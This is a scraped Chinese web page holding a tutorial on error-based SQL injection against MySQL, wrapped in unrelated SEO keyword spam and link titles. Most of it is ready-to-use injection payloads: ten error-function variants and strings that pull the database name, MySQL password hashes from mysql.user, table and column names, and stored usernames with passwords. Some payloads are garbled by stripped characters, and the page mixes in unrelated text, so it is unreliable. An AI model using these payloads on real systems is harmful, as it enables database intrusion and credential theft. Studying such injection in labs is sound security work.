当前位置: 首页 > news >正文

网站建设营销平台沭阳网站建设托管

网站建设营销平台,沭阳网站建设托管,商城app定制开发,动画制作app报错注入报错注入定义代码展示常用的报错语句1.获取数据库名称2.获取mysql账号密码3.获取表名4.获取字段名5.获取账号密码报错注入定义 报错注入:利用sql语句的不规范,获取相关sql提示信息 代码展示 常用的报错语句 select first_name, last_name FROM…

报错注入

    • 报错注入定义
    • 代码展示
    • 常用的报错语句
      • 1.获取数据库名称
      • 2.获取mysql账号密码
      • 3.获取表名
      • 4.获取字段名
      • 5.获取账号密码

报错注入定义

报错注入:利用sql语句的不规范,获取相关sql提示信息

代码展示

在这里插入图片描述

常用的报错语句

select first_name, last_name FROM users where user_id = ‘1’ and info() –
#获取当前使用的库
1’ and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) – 或version() 、database()
#获取数据库敏感信息
1.floor()
select * from test where id=1 and (select 1 from (select
count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by
x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select *
from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select
user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select
user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select
user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select
user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select
user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));

1.获取数据库名称

1' and info() -- 

在这里插入图片描述

2.获取mysql账号密码

1' and updatexml(1,concat(0x7e,(select (select authentication_string from mysql.user limit 1 )),0x7e),1) -- 
1' and updatexml(1,concat(0x7e,(select (substring((select authentication_string from mysql.user limit 1),32,40))),0x7e),1) -- 

因为一条只能显示32字符,所以两段拼接则为mysql密码
在这里插入图片描述
在这里插入图片描述

3.获取表名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在这里插入图片描述

4.获取字段名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='users' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在这里插入图片描述
借助burpsuite

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

5.获取账号密码

1' and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,user,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在这里插入图片描述

http://www.yayakq.cn/news/305115/

相关文章:

  • 做笔记的网站源码wordpress免签约支付宝
  • ps做图游戏下载网站有哪些内容中国商标查询官网
  • 关于卖零食网站建设需求分析wordpress模板更换
  • 昆明建设网站制作百度关键词优化的方法
  • 长春建筑网站网站开发费
  • 一个企业做网站需要什么资料wordpress文章编辑软件
  • 济南网站建设内容设计网站开发7个基本流程
  • 制作很好的网站wordpress页眉导航栏位置
  • 对于学校网站建设的建议做海报那个网站好
  • 17做网店类似网站免费网站制作作业
  • 企业网站的设计思路自己建设网站需要多少钱
  • 体育健身网站建设东莞营销网站建设价格
  • 漳州市城乡住房建设局网站如何建设网站使用
  • 百度网盟有哪些网站吉林省 网站建设
  • 宁波派桑网站建设热门活动页面html
  • 关于网站建设项目收取费用网站备案政策
  • 网站主体信息易点设计
  • 建站时网站地图怎么做海淀最新消息今天
  • 昆明做网站的网络公司长沙网络营销推广
  • 网站建设书籍免费南宁经典网站建设
  • 电脑记事本做复杂网站网页设计图片怎么换
  • asp网站伪静态规则wordpress 结构化数据
  • 中山网站建设外包cnnic网站
  • 网站的内链是什么意思郑州400建站网站建设
  • 目前做网站需要什么cms2015wordpress漏洞
  • 怎样健网站海山网站建设
  • 做物流网站的公司哪家好深圳影视传媒公司有哪些
  • 广东做网站的公司有哪些连云港网站优化
  • 北京网站建设及推广招聘广告投放运营
  • 网站开发公司业务员培训网站产品页排名怎么做